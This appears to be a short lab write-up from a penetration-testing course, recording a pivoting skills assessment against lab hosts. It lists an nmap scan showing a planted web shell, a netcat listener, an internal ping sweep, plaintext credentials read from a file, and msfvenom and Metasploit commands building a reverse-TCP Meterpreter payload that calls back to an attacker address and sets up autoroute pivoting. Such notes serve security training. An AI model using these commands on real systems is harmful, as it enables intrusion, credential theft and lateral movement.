Skills Assessment

June 26, 2024

# Nmap 7.94SVN scan initiated Wed Jun 26 15:26:49 2024 as: nmap -sC -sV -oN nmap 10.129.229.129
Nmap scan report for 10.129.229.129
Host is up (0.38s latency).
Not shown: 995 closed tcp ports (conn-refused)
PORT     STATE    SERVICE    VERSION
22/tcp   open     ssh        OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 71:08:b0:c4:f3:ca:97:57:64:97:70:f9:fe:c5:0c:7b (RSA)
|   256 45:c3:b5:14:63:99:3d:9e:b3:22:51:e5:97:76:e1:50 (ECDSA)
|_  256 2e:c2:41:66:46:ef:b6:81:95:d5:aa:35:23:94:55:38 (ED25519)
80/tcp   open     http       Apache httpd 2.4.41 ((Ubuntu))
|_http-title: p0wny@shell:~#
1049/tcp filtered td-postman
7019/tcp filtered doceri-ctl
8290/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jun 26 15:38:15 2024 -- 1 IP address (1 host up) scanned in 685.12 seconds

nc -lnvp 9001

for i in {1..254} ;do (ping -c 1 172.16.5.$i | grep "bytes from" &) ;done

cat for-admin-eyes-only

user - mlefay
pass - Plain Human work!

subl id-rsa

ping 172.16.5.35

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.14.218 -f elf -o rev-shell LPORT=8080

set payload linux/x64/meterpreter/reverse_tcp
set lhost 10.10.14.218
set lport 8080

use post/multi/manage/autoroute
set SESSION 1
set SUBNET 172.16.5.0
run

PreviousRDP and SOCKS Tunneling with SocksOverRDP NextActive Directory Enumeration & Attacks

Last updated 1 year ago